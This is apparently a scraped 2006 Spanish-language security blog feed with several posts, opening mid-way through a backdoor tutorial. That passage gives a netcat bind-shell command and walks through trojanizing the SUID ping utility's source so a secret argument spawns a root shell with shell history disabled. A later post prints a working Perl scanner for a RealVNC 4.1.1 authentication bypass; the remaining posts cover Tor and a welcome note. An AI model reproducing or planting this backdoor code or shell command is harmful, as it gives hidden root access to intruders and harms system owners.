class="MsoNormal" style="margin-left: 18pt;"><span lang="EN-GB" style="font-size:10;">nc –l –e /bin/bash –p 6969 > /dev/null 2>&1 &<o:p></o:p></span></p> </td> </tr> </tbody></table> <p class="MsoNormal"><span style="" lang="EN-GB"><o:p> </o:p></span></p> <p class="MsoNormal">Los métodos mostrados hasta ahora podríamos decir que son un tanto antiguos y aunque hoy en dia están en desuso, sería difícil que actualmente funcionaran aunque nos podrían servir para salir del paso.</p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal"><b style=""><i style="">Creación de puertas traseras a partir de la modificación de utilidades comunes de administración:<o:p></o:p></i></b></p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal">Una forma válida para crear una puerta trasera más o menos discreta, es hacer uso de aplicaciones de uso corriente y que contengan por defecto el bit <i style="">SUID </i>activado. </p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal">Podemos utilizar por ejemplo la utilidad <i style="">ping</i> que se utiliza para testar conexiones mediante el protocolo ICMP. </p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal">Para poder modificar esta utilidad, necesitaremos obtener sus fuentes. Podemos encontrarlas en esta dirección <a href="http://mrtg.planetmirror.com/pub/ip-routing/iputils-current.tar.gz">http://mrtg.planetmirror.com/pub/ip-routing/iputils-current.tar.gz</a> . </p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal">Una vez descargado y descomprimido, localizaremos el fichero correspondiente a <i style="">ping (ping.c).</i> Abrimos el fichero y nos centraremos en la función main:</p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal"><span style=""> </span></p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal" style="margin-left: 27pt;"><span style="font-size:10;"><o:p> </o:p></span></p> <p class="MsoNormal" style="margin-left: 27pt;"><span style="font-size:10;"><span style=""> </span><o:p></o:p></span></p> <table class="MsoTableGrid" style="border: medium none ; background: rgb(224, 224, 224) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; border-collapse: collapse;" border="1" cellpadding="0" cellspacing="0"> <tbody><tr style=""> <td style="border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 432.2pt;" valign="top" width="576"> <p class="MsoNormal" style="text-indent: 27pt;"><span style="" lang="EN-GB">…<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB"><o:p> </o:p></span></p> <p class="MsoNormal" style="margin-left: 27pt;"><span lang="EN-GB" style="font-size:10;">main(int argc, char **argv)<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 27pt;"><span lang="EN-GB" style="font-size:10;">{<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 27pt;"><span lang="EN-GB" style="font-size:10;"><span style=""> </span>struct hostent *hp;<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 27pt;"><span lang="EN-GB" style="font-size:10;"><span style=""> </span>int ch, hold, packlen;<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 27pt;"><span lang="EN-GB" style="font-size:10;"><span style=""> </span>int socket_errno;<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 27pt;"><span lang="EN-GB" style="font-size:10;"><span style=""> </span>u_char *packet;<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 27pt;"><span lang="EN-GB" style="font-size:10;"><span style=""> </span>char *target, hnamebuf[MAXHOSTNAMELEN];<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 27pt;"><span lang="EN-GB" style="font-size:10;"><span style=""> </span>char rspace[3 + 4 * NROUTES + 1];<span style=""> </span>/* record route space */<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 27pt;"><span lang="EN-GB" style="font-size:10;"><o:p> </o:p></span></p> <p class="MsoNormal" style="margin-left: 27pt;"><span lang="EN-GB" style="font-size:10;"><span style=""> </span>icmp_sock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 27pt;"><span lang="EN-GB" style="font-size:10;"><span style=""> </span>socket_errno = errno;<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 27pt;"><span lang="EN-GB" style="font-size:10;"><o:p> </o:p></span></p> <p class="MsoNormal" style="margin-left: 27pt;"><span lang="EN-GB" style="font-size:10;"><span style=""> </span>uid = getuid();<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 27pt;"><span lang="EN-GB" style="font-size:10;"><span style=""> </span>setuid(uid);<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 27pt;"><span lang="EN-GB" style="font-size:10;"><o:p> </o:p></span></p> <p class="MsoNormal" style="margin-left: 27pt;"><span lang="EN-GB" style="font-size:10;"><span style=""> </span>source.sin_family = AF_INET;<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 27pt;"><span lang="EN-GB" style="font-size:10;"><o:p> </o:p></span></p> <p class="MsoNormal" style="margin-left: 27pt;"><span lang="EN-GB" style="font-size:10;"><span style=""> </span></span><span style="font-size:10;">preload = 1;<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 27pt;"><span style="font-size:10;"><o:p> </o:p></span></p> <p class="MsoNormal" style="text-indent: 35.4pt;"><span style="font-size:10;">…<o:p></o:p></span></p> <p class="MsoNormal"><o:p> </o:p></p> </td> </tr> </tbody></table> <p class="MsoNormal" style="text-indent: 35.4pt;"><span style="font-size:10;"><o:p> </o:p></span></p> <p class="MsoNormal" style="margin-left: 27pt;">Como vemos, las lineas:<o:p></o:p></p> <p class="MsoNormal" style="margin-left: 27pt;"><span style="font-size:10;"><span style=""> </span><span style=""> </span><o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 27pt;"><span style="font-size:10;"><span style=""> </span><o:p></o:p></span></p> <table class="MsoTableGrid" style="border: medium none ; background: rgb(224, 224, 224) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; border-collapse: collapse;" border="1" cellpadding="0" cellspacing="0"> <tbody><tr style=""> <td style="border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 432.2pt;" valign="top" width="576"> <p class="MsoNormal" style="margin-left: 27pt;"><span style="font-size:10;">uid = getuid();<o:p></o:p></span></p> <p class="MsoNormal"><span style="font-size:10;"><span style=""> </span><span style=""> </span><span style=""> </span>setuid(uid);</span></p> </td> </tr> </tbody></table> <p class="MsoNormal" style="margin-left: 27pt;"><o:p> </o:p></p> <p class="MsoNormal">Provocan que se pierdan los privilegios de root y se asignen los del usuario actual al programa. <o:p></o:p></p> <p class="MsoNormal"><span style="font-size:10;"><o:p> </o:p></span></p> <table class="MsoTableGrid" style="border: medium none ; background: rgb(224, 224, 224) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; border-collapse: collapse;" border="1" cellpadding="0" cellspacing="0"> <tbody><tr style=""> <td style="border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 432.2pt;" valign="top" width="576"> <p class="MsoNormal" style="margin-left: 36pt;"><span lang="EN-GB" style="font-size:10;">if (strcmp(“skarvin”, argv[1])==0){<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 36pt; text-indent: 35.4pt;"><span lang="EN-GB" style="font-size:10;">char *cad[2];<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 36pt; text-indent: 17.4pt;"><span lang="EN-GB" style="font-size:10;">cad[0]="/bin/bash";<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 36pt; text-indent: 17.4pt;"><span lang="EN-GB" style="font-size:10;">cad[1]=NULL;<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 36pt;"><span lang="EN-GB" style="font-size:10;"><span style=""> </span>setuid(0);<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 36pt;"><span lang="EN-GB" style="font-size:10;"><span style=""> </span>setgid(0);<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 36pt;"><span lang="EN-GB" style="font-size:10;"><span style=""> </span>unsetenv(“HISTFILE”); <o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 36pt; text-indent: 17.4pt;"><span lang="EN-GB" style="font-size:10;">execve(cad[0], cad, NULL);<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 36pt;"><span lang="EN-GB" style="font-size:10;">}<o:p></o:p></span></p> <p class="MsoNormal"><span lang="EN-GB" style="font-size:10;"><o:p> </o:p></span></p> </td> </tr> </tbody></table> <p class="MsoNormal" style="margin-left: 36pt;"><span lang="EN-GB" style="font-size:10;"><o:p> </o:p></span></p> <p class="MsoNormal"><span lang="EN-GB" style="font-size:10;"><o:p> </o:p></span></p> <p class="MsoNormal">Por lo que el código principal de la main en <i style="">ping.c </i>quedará de esta forma:</p> <p class="MsoNormal"><o:p> </o:p></p> <table class="MsoTableGrid" style="border: medium none ; background: rgb(224, 224, 224) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; border-collapse: collapse;" border="1" cellpadding="0" cellspacing="0"> <tbody><tr style=""> <td style="border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 432.2pt;" valign="top" width="576"> <p class="MsoNormal" style="text-indent: 27pt;"><span style="" lang="EN-GB">…<o:p></o:p></span></p> <p class="MsoNormal"><span style="" lang="EN-GB"><o:p> </o:p></span></p> <p class="MsoNormal" style="margin-left: 27pt;"><span lang="EN-GB" style="font-size:10;">main(int argc, char **argv)<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 27pt;"><span lang="EN-GB" style="font-size:10;">{<o:p></o:p></span></p> <p class="MsoNormal" style="text-indent: 35.4pt;"><span lang="EN-GB" style="font-size:10;">if (strcmp(“skarvin”, argv[1])==0){<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 35.4pt; text-indent: 35.4pt;"><span lang="EN-GB" style="font-size:10;">char *cad[2];<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 53.4pt; text-indent: 17.4pt;"><span lang="EN-GB" style="font-size:10;">cad[0]="/bin/bash";<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 36pt; text-indent: 34.8pt;"><span lang="EN-GB" style="font-size:10;">cad[1]=NULL;<o:p></o:p></span></p> <p class="MsoNormal"><span lang="EN-GB" style="font-size:10;"><span style=""> </span><span style=""> </span>setuid(0);<o:p></o:p></span></p> <p class="MsoNormal"><span lang="EN-GB" style="font-size:10;"><span style=""> </span>setgid(0);<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 18pt;"><span lang="EN-GB" style="font-size:10;"><span style=""> </span>unsetenv(“HISTFILE”); <o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 53.4pt; text-indent: 17.4pt;"><span lang="EN-GB" style="font-size:10;">execve(cad[0], cad, NULL);<o:p></o:p></span></p> <p class="MsoNormal" style="text-indent: 27pt;"><span lang="EN-GB" style="font-size:10;">}<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 27pt;"><span lang="EN-GB" style="font-size:10;"><o:p> </o:p></span></p> <p class="MsoNormal" style="margin-left: 27pt;"><span lang="EN-GB" style="font-size:10;"><span style=""> </span>struct hostent *hp;<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 27pt;"><span lang="EN-GB" style="font-size:10;"><span style=""> </span>int ch, hold, packlen;<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 27pt;"><span lang="EN-GB" style="font-size:10;"><span style=""> </span>int socket_errno;<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 27pt;"><span lang="EN-GB" style="font-size:10;"><span style=""> </span>u_char *packet;<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 27pt;"><span lang="EN-GB" style="font-size:10;"><span style=""> </span>char *target, hnamebuf[MAXHOSTNAMELEN];<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 27pt;"><span lang="EN-GB" style="font-size:10;"><span style=""> </span>char rspace[3 + 4 * NROUTES + 1];<span style=""> </span>/* record route space */<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 27pt;"><span lang="EN-GB" style="font-size:10;"><o:p> </o:p></span></p> <p class="MsoNormal" style="margin-left: 27pt;"><span lang="EN-GB" style="font-size:10;"><span style=""> </span><span style=""> </span>icmp_sock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 27pt;"><span lang="EN-GB" style="font-size:10;"><span style=""> </span>socket_errno = errno;<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 27pt;"><span lang="EN-GB" style="font-size:10;"><o:p> </o:p></span></p> <p class="MsoNormal" style="margin-left: 27pt;"><span lang="EN-GB" style="font-size:10;"><span style=""> </span>uid = getuid();<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 27pt;"><span lang="EN-GB" style="font-size:10;"><span style=""> </span>setuid(uid);<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 27pt;"><span lang="EN-GB" style="font-size:10;"><o:p> </o:p></span></p> <p class="MsoNormal" style="margin-left: 27pt;"><span lang="EN-GB" style="font-size:10;"><span style=""> </span>source.sin_family = AF_INET;<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 27pt;"><span lang="EN-GB" style="font-size:10;"><o:p> </o:p></span></p> <p class="MsoNormal" style="margin-left: 27pt;"><span lang="EN-GB" style="font-size:10;"><span style=""> </span></span><span style="font-size:10;">preload = 1;<o:p></o:p></span></p> <p class="MsoNormal" style="margin-left: 27pt;"><span style="font-size:10;"><o:p> </o:p></span></p> <p class="MsoNormal" style="text-indent: 35.4pt;"><span style="font-size:10;">…<o:p></o:p></span></p> <p class="MsoNormal"><o:p> </o:p></p> </td> </tr> </tbody></table> <p class="MsoNormal"><o:p> </o:p></p> <p class="MsoNormal"><o:p> </o:p><br /></p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/29362263-115049606744442033?l=skarvin.blogspot.com' alt='' /></div>skarvinhttp://www.blogger.com/profile/01024146001745496577noreply@blogger.com2tag:blogger.com,1999:blog-29362263.post-1150270916582614912006-06-14T09:41:00.002+02:002008-02-20T01:02:13.887+01:00Grave vulnerabilidad en RealVNC 4.1.1Hace ya algún tiempo, se informó sobre una grave vulnerabilidad del servidor vnc de RealVNC (4.1.1). Esta vulnerabilidad puede llevar a un atacante, sin grandes conocimientos en informática y programación a poder tomar el control de un equipo con este software instalado.<br /><br />Esta vulnerabilidad radica en un fallo en la autentificación que el cliente VNC envía al servidor, por lo que si el cliente modifica el tipo de autentificación, éste puede acceder sin ningún tipo de restricción por contraseña al servidor.<br /><br />Se pueden ver la gran cantidad de gente que suele utilizar este software haciendo click en este <a href="http://www.google.es/search?q=inurl%3A5800+%22VNC+Desktop%22+&start=0&amp;amp;ie=utf-8&oe=utf-8&amp;client=firefox-a&rls=org.mozilla:es-ES:official">link</a>.<br />Y mediante este simple scanner, se puede comprobar la gravedad de este fallo:<br /><br /><br /><table><tbody><tr><td bgcolor="lightgrey"><br />#!/usr/bin/perl<br /><br /># scan for OpenVNC 4.11 authentication bypass<br /><br />use IO::Socket;<br /><br />$host = $ARGV[0];<br />$port = $ARGV[1] || 5900;<br /><br />$host or die("$0 <host> <port>\n");<br /><br />#print "Connecting to $host:$port..."; $| = 1;<br />($sock = IO::Socket::INET->new(PeerAddr => $host,<br /> PeerPort => $port,<br /> Proto => 'tcp',)) ? print "success!\n"<br />: die("failed\n");<br /><br /><br />#negotiate protocol<br />$sock->read($protocol_version,12);<br />print $sock $protocol_version;<br /># print "Using protocol $protocol_version";<br /><br /># get security types that we'll be ignoring<br />$sock->read($security_types,1);<br />$sock->read($hahaha,unpack('C',$security_types));<br /><br /># choose no authentication<br />print $sock "\x01";<br /><br /># we should get "0000" back<br />$sock->read($in,4);<br />if(unpack('I',$in)) { die("Not vulnerable\n") };<br /><br /># client initialize<br />print $sock "\x01";<br /><br /># if the server starts sending data we are in<br />$sock->read($in,4);<br />(unpack('I',$in)) ? print("$host Vulnerable!\n") : die("Not vulnerable\n") ;<br /><br />exit;<br /></port></host></td></tr></tbody></table><br />Desde aquí recomiendamos actualizar a la versión 4.2.5, disponible<a href="http://www.realvnc.com/cgi-bin/download.cgi"> aquí.</a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/29362263-115027091658261491?l=skarvin.blogspot.com' alt='' /></div>skarvinhttp://www.blogger.com/profile/01024146001745496577noreply@blogger.com2tag:blogger.com,1999:blog-29362263.post-1150141167060877562006-06-12T21:38:00.000+02:002006-06-12T21:39:27.063+02:00Tor: Un sistema anonimo de comunicacion por InternetDesde hace varios meses, existe a disposición de cualquier usuario, una herramienta muy útil cuando se quiere obtener acceso a Internet de manera anónima. La red Tor, es una red de tipo "Onion" por lo que cada transmisión que se envía a un host determinado, pasa por esta red dando varios saltos por diversos "servidores Tor" antes de contactar con el host final. Éste hecho hace que el host que establece la conexión con el host final no seamos nosotros, sinó que será el último "servidor Tor" el que la haga. Tor establece rutas aleatorias cada vez que el usuario accede a un recurso. Además, estas rutas<br /><br />Aquí muestro unas imagen sobre como se realiza la navegación por la red de Tor:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://tor.eff.org/images/htw2.png"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px;" src="http://tor.eff.org/images/htw2.png" alt="" border="0" /></a><br />Según la web de tor (http://tor.eff.org/) cuentan:<br />"El circuito se extiende un tramo cada vez y cada servidor a lo largo del camino conoce unicamente que servidor le proporciona los datos y a que servidor se los entrega. Ningun servidor individual conoce nunca el recorrido completo que ha tomado un paquete de datos. El cliente negocia un conjunto separados de claves de encriptacion para cada tramo a lo largo del circuito para asegurar que cada tramo no puede rastrear estas conexiones a medida que lo atraviesan."<br /><br />Podemos utilizar cualquier programa por la red Tor, por lo que nuestro programa de mensajería, correo, navegador web, teminal Ssh, etc... podrán pasar a ser anónimos.<br /><br />Existe un plugin para Firefox el cual os lo podéis bajar <a href="https://addons.mozilla.org/firefox/2464/">aquí</a> el programa cliente de Tor os lo podéis bajar <a href="http://tor.eff.org/download.html.es">aquí</a>.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/29362263-115014116706087756?l=skarvin.blogspot.com' alt='' /></div>skarvinhttp://www.blogger.com/profile/01024146001745496577noreply@blogger.com1tag:blogger.com,1999:blog-29362263.post-1150125080751064962006-06-12T17:10:00.000+02:002006-06-12T17:11:20.760+02:00Wellcome!Bienvenidos a este blog dedicado a la seguridad informática en el que iré publicando artículos, manuales y recursos de interés para el administrador de sistemas.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/29362263-115012508075106496?l=skarvin.blogspot.com' alt='' /></div>skarvinhttp://www.blogger.com/profile/01024146001745496577noreply@blogger.com1